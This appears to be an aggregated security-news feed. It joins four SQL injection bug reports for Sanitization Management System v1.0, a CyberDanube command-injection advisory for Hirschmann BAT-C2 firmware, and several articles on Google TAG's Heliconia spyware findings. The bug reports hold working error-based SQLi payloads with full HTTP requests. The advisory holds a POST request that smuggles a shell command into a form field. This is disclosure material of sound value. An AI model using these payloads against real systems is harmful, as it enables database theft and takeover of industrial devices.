Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/orders/update_status.php?id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: BGP-OSPF

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/orders/update\_status.php?id=

Vulnerability location: /php-sms/admin/orders/update\_status.php?id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/orders/update\_status.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/orders/update\_status.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44348: bug_report/SQLi-3.md at main · BGP-OSPF/bug_report

By Habiba Rashid
A Barcelona-based company, a spyware vendor named Variston IT, is exploiting flaws under the guise of a custom cybersecurity solutions provider.
This is a post from HackRead.com Read the original post: Spyware Vendor Variston Exploited Chrome, Firefox and Windows 0-days

On 30th November, Google’s Threat Analysis Group (TAG) reported that a Barcelona-based company, actually a spyware vendor, named Variston IT has been exploiting n-day vulnerabilities in Chrome, Firefox, and **Microsoft Defender** under the guise of a custom cybersecurity solutions provider. 

In their detailed technical report, TAG explained that Variston IT had been using their exploitation framework called Heliconia to install spyware on the targeted devices. The researchers at Google received an anonymous submission to Chrome’s bug reporting program which brought to their attention the exploitation framework.

Heliconia actually contains three separate exploitation frameworks. One of them is used to compromise the Chrome renderer bug so that it can escape the walls of the app’s sandbox and run malware on the operating system.

Another one is used to deploy **malicious PDF documents** containing an exploit for Windows Defender (a built-in antivirus engine in the newer versions of Windows).  The last framework is for compromising Windows and Linux machines by using a set of Firefox exploits. 

A manifest file in the source code provides a product description (Image: Google)

In its **report**, the tech giant observed that the Heliconia exploit is successful against Firefox versions 64 to 68, which suggests that it was created and used as early as December 2018 when Firefox 64 first came out.

Google, Microsoft, and Mozilla fixed the vulnerabilities in 2021 and early 2022. They further stated that, although they had not detected active exploitation, it is likely that the vulnerabilities had been exploited before they could be fixed.

1.  **Google cracks down on sites with ties to hack-for-hire groups**
2.  **Israeli Spyware Vendor Use Chrome 0day to Target Journalists**
3.  **ISPs Helping Attackers Install Hermit Spyware on Smartphones**
4.  **Malware vendor returns with yet another nasty Android malware**
5.  **European Spyware Vendor Offer Android and iOS Device Exploits**

According to Google, **commercial spyware vendors** put advanced surveillance capabilities in the hands of governments who can then use them to spy on journalists, human rights activists, political opposition, and dissidents.

Therefore, there needs to be more transparency to ensure that companies adhere to their stated ethical standards in whom they make transactions with and whom they target with their products.

It is advised that users keep their Chrome and other software up-to-date with the security patches to ensure full protection against Heliconia.

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Spyware Vendor Variston Exploited Chrome, Firefox and Windows 0-days

A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018.
"Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to

A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018.

"Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to deploy a payload to a target device," Google Threat Analysis Group (TAG) researchers Clement Lecigne and Benoit Sevens said in a write-up.

Variston, which has a bare-bones website, claims to "offer tailor made Information Security Solutions to our customers," "design custom security patches for any kind of proprietary system," and support the "the discovery of digital information by \[law enforcement agencies\]," among other services.

The vulnerabilities, which have been patched by Google, Microsoft, and Mozilla in 2021 and early 2022, are believed to have been utilized as zero-days to help customers install malware of their choice on the targeted systems.

Heliconia comprises a trio of components, namely Noise, Soft, and Files, each of which are responsible for deploying exploits against bugs in Chrome, Windows, and Firefox, respectively.

Noise is designed to take advantage of a security flaw in the Chrome V8 engine JavaScript engine that was patched in August 2021 as well as an unknown sandbox escape method called "chrome-sbx-gen" to enable the final payload (aka "agent") to be installed on targeted devices.

However, the attack banks on the prerequisite that the victim accesses a booby-trapped webpage to trigger the first-stage exploit.

Heliconia Noise can be additionally configured by the purchaser using a JSON file to set different parameters like the maximum number of times to serve the exploits, an expiration date for the servers, redirect URLs for non-target visitors, and rules specifying when a visitor should be considered a valid target.

Soft is a web framework that's engineered to deliver a decoy PDF document featuring an exploit for CVE-2021-42298, a remote code execution flaw impacting Microsoft Defender that was fixed by Redmond in November 2021. The infection chain, in this case, entailed the user visiting a malicious URL, which then served the weaponized PDF file.

The Files package – the third framework – contains a Firefox exploit chain for Windows and Linux that leverages a use-after-free flaw in the browser that was reported in March 2022 (CVE-2022-26485). However, it's suspected that the bug was likely abused since at least 2019.

Google TAG said it became aware of the Heliconia attack framework after receiving an anonymous submission to its Chrome bug reporting program. It further noted that there's no current evidence of exploitation, either indicating the toolset has been put to rest or evolved further.

The development arrives more than five months after the tech giant's cybersecurity division linked a previously unattributed Android mobile spyware, dubbed Hermit, to Italian software outfit, RCS Lab.

"The growth of the spyware industry puts users at risk and makes the Internet less safe, and while surveillance technology may be legal under national or international laws, they are often used in harmful ways to conduct digital espionage against a range of groups," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Accuses Spanish Spyware Vendor of Exploiting Chrome, Firefox, and Windows Zero-Days

The Heliconia hacking tool exploited vulnerabilities in Chrome, Windows Defender, and Firefox, according to company security researchers.

The commercial spyware industry has increasingly come under fire for selling powerful surveillance tools to anyone who can pay, from governments to criminals around the world. Across the European Union, details of how spyware has been used to target activists, opposition leaders, lawyers, and journalists in multiple countries have recently touched off scandals and calls for reform. Today, Google's Threat Analysis Group announced action to block one such hacking tool that targeted desktop computers and was seemingly developed by a Spanish firm.

The exploitation framework, dubbed Heliconia, came to Google's attention after a series of anonymous submissions to the Chrome bug reporting program. The disclosures pointed to exploitable vulnerabilities in Chrome, Windows Defender, and Firefox that could be abused to deploy spyware on target devices, including Windows and Linux computers. The submission included source code from the Heliconia hacking framework and called the vulnerabilities Heliconia Noise, Heliconia Soft, and Files. Google says the evidence points to the Barcelona-based tech firm Variston IT as the developer of the hacking framework.

“The findings indicate that we have many small players within the spyware industry, but with strong capabilities related to zero days,” TAG researchers told WIRED, referring to unknown, unpatched vulnerabilities. 

Variston IT did not respond to a request for comment from WIRED. The company's director, Ralf Wegner, told TechCrunch that Variston was not given the opportunity to review Google’s research and could not validate it. He added that he “would be surprised if such item was found in the wild.” Google confirmed that the researchers did not contact Variston IT in advance of publication, as is the company's standard practice in these types of investigations. 

Google, Microsoft, and Mozilla patched the Heliconia vulnerabilities in 2021 and 2022, and Google says it has not detected any current exploitation of the bugs. But evidence in the bug submissions indicates that the framework was likely being used to exploit the flaws starting in 2018 and 2019, long before they were patched. Heliconia Noise exploited a Chrome renderer vulnerability and a sandbox escape, while Heliconia Soft used a malicious PDF laced with a Windows Defender exploit, and Files deployed a group of Firefox exploits for Windows and Linux. TAG collaborated on the research with members of Google's Project Zero bug-hunting group and the Chrome V8 security team.

The fact that Google does not see current evidence of exploitation may mean that the Heliconia framework is now dormant, but it might also indicate that the hacking tool has evolved. “It could be there are other exploits, a new framework, their exploits didn’t cross our systems, or there are other layers now to protect their exploits,” TAG researchers told WIRED.

Ultimately, the group says its goal with this type of research is to shed light on the commercial spyware industry's methods, technical capabilities, and abuses. TAG created detections for Google's Safe Browsing service to warn about Heliconia-related sites and files, and the researchers emphasize that it's always important to keep software up to date.

“The growth of the spyware industry puts users at risk and makes the internet less safe,” TAG wrote in a blog post about the findings. “And while surveillance technology may be legal under national or international laws, they are often used in harmful ways to conduct digital espionage against a range of groups.”

Google Moves to Block Invasive Spanish Spyware Framework

Hirschmann (Belden) BAT-C2 version 8.8.1.0R8 suffers from a remote authenticated command injection vulnerability.

    CyberDanube Security Research 20221124-0-------------------------------------------------------------------------------                title| Authenticated Command Injection              product| Hirschmann (Belden) BAT-C2   vulnerable version| 8.8.1.0R8        fixed version| 09.13.01.00R04           CVE number| CVE-2022-40282               impact| High             homepage| https://hirschmann.com/                     | https://beldensolutions.com                found| 2022-08-01                   by| T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"The Technology and Market Leader in Industrial Networking. Hirschmann™develops innovative solutions, which are geared towards its customers’requirements in terms of performance, efficiency and investmentreliability."Source: https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtmlVulnerable versions-------------------------------------------------------------------------------Hirschmann BAT-C2 / 8.8.1.0R8Vulnerability overview-------------------------------------------------------------------------------1) Authenticated Command InjectionThe web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, or controls various critical equipment via serial ports,more extensive damage in the corresponding network can be done by an attacker.Proof of Concept-------------------------------------------------------------------------------1) Authenticated Command InjectionThe command "ping 192.168.1.1" was injected to the system by using thefollowing POST request:===============================================================================POST / HTTP/1.1Host: 192.168.3.150User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 75Origin: https://192.168.3.150Authorization: Digest username="admin", realm="config", nonce="4b63bb796252d310", uri="/", algorithm=MD5, response="dbcf03216bd8fbaa15f4b9d9d0fc1d43", qop=auth, nc=0000000a, cnonce="99c14d39557e691d"Referer: https://192.168.3.150/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/=============================================================================== The vulnerability was manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------Upgrade to firmware version 09.13.01.00R04 or above.A security bulletin for this vulnerability has been published by the vendor:https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/Workaround-------------------------------------------------------------------------------NoneRecommendation-------------------------------------------------------------------------------CyberDanube recommends customers from Hirschmann to upgrade the firmware to thelatest version available. Furthermore, a full security review by professionalsis recommended.Contact Timeline-------------------------------------------------------------------------------2022-08-03: Contacting Hirschmann via BEL-SM-PSIRT@belden.com; Belden contact             suspects a duplicate. Asked contact for more information.2022-08-18: Belden representative sent more information for clarification.             Highlighted differences between PoCs.2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.2022-08-30: Asked for an update.2022-08-31: Vendor stated, that he will release another security bulletin for             this vulnerability.2022-09-27: Asked for an update.2022-09-28: Vendor is currently testing the new firmware version and has also             been assigned with an CVE number. Draft of security bulletin was             also sent by the security contact.2022-10-12: Asked for an update.2022-10-13: Belden contact stated, that there is no publication date for now as             another patch must be integrated.2022-10-28: Security contact informed us, that the patch will be released             within the next two weeks.2022-11-22: Asked for a status update; Security contact stated, that the             release was delayed due internal reasons.2022-11-23: Vendor sent the final version of the security bulletins. The             release of the new firmware version will be 2022-11-28.2022-11-24: Vendor informed CyberDanube that the release of the bulletin and             the firmware was done on 2022-11-23 by the marketing team.             Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF T. Weber / @2022

Hirschmann (Belden) BAT-C2 8.8.1.0R8 Command Injection

The framework has ties back to a Spanish exploit broker called Variston IT, and offers a one-stop shop for compromising Chrome, Defender and Firefox.

Google's Threat Analysis Group (TAG) has discovered a cyberattack framework dubbed Heliconia, built to exploit zero-day and n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender. It likely has connections to a gray-market spyware broker called Variston IT, which highlights how this shadowy segment is flourishing.

The Heliconia threat consists of three modules:

*   Heliconia Noise for compromising the Chrome browser, escaping the sandbox, and installing malware;
*   Heliconia Soft, a Web framework that deploys a PDF containing a Windows Defender exploit for CVE-2021-42298 that allows privilege escalation to SYSTEM and remote code execution (RCE);
*   And the Heliconia Files package which contains a fully documented Firefox exploit chain for Windows and Linux, including CVE-2022-26485 for RCE.

TAG became aware of the threat after receiving an anonymous submission to the Chrome bug reporting program. Upon further investigation, the Heliconia framework's source code was found to contain a script that points back to Variston IT, a Barcelona-headquartered entity that claims to provide "custom security solutions."

Commercial spyware is often sold by organizations claiming to be legitimate companies, for "use by law enforcement." However, mounting evidence shows that too often, these brokers don't vet their clients, "putting advanced surveillance capabilities in the hands of governments who use them to spy on journalists, human rights activists, political opposition and dissidents," according to a TAG posting on Wednesday.

Researchers noted that Variston IT is firmly in the middle of this proliferating market — a space that has seen sanctioning by the United States and others against organizations like the infamous NSO Group, creator of the Pegasus spyware.

"The commercial surveillance industry is thriving and has expanded significantly in recent years, creating risk for Internet users around the globe," TAG researchers added. "While surveillance technology may be legal under national or international laws, they are often used in harmful ways to conduct digital espionage against a range of groups."

So far, none of the modules has been seen in current attacks in the wild, but TAG researchers noted that they've likely been deployed in the past, including using the exploits they contain as zero-days before they were fixed.

Google TAG Warns on Emerging Heliconia Exploit Framework for RCE

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/quotes/manage_remark.php?id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Distance

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/quotes/manage\_remark.php?id=

Vulnerability location: /php-sms/admin/quotes/manage\_remark.php?id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/quotes/manage\_remark.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/quotes/manage\_remark.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44296: bug_report/SQLi-2.md at main · Distance10086/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/orders/assign_team.php?id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Distance

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/orders/assign\_team.php?id=

Vulnerability location: /php-sms/admin/orders/assign\_team.php?id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/orders/assign\_team.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/orders/assign\_team.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44295: bug_report/SQLi-1.md at main · Distance10086/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=services/manage_service&id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Distance

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/?page=services/manage\_service&id=

Vulnerability location: /php-sms/admin/?page=services/manage\_service&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=services/manage\_service&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=services/manage\_service&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

Tag

#firefox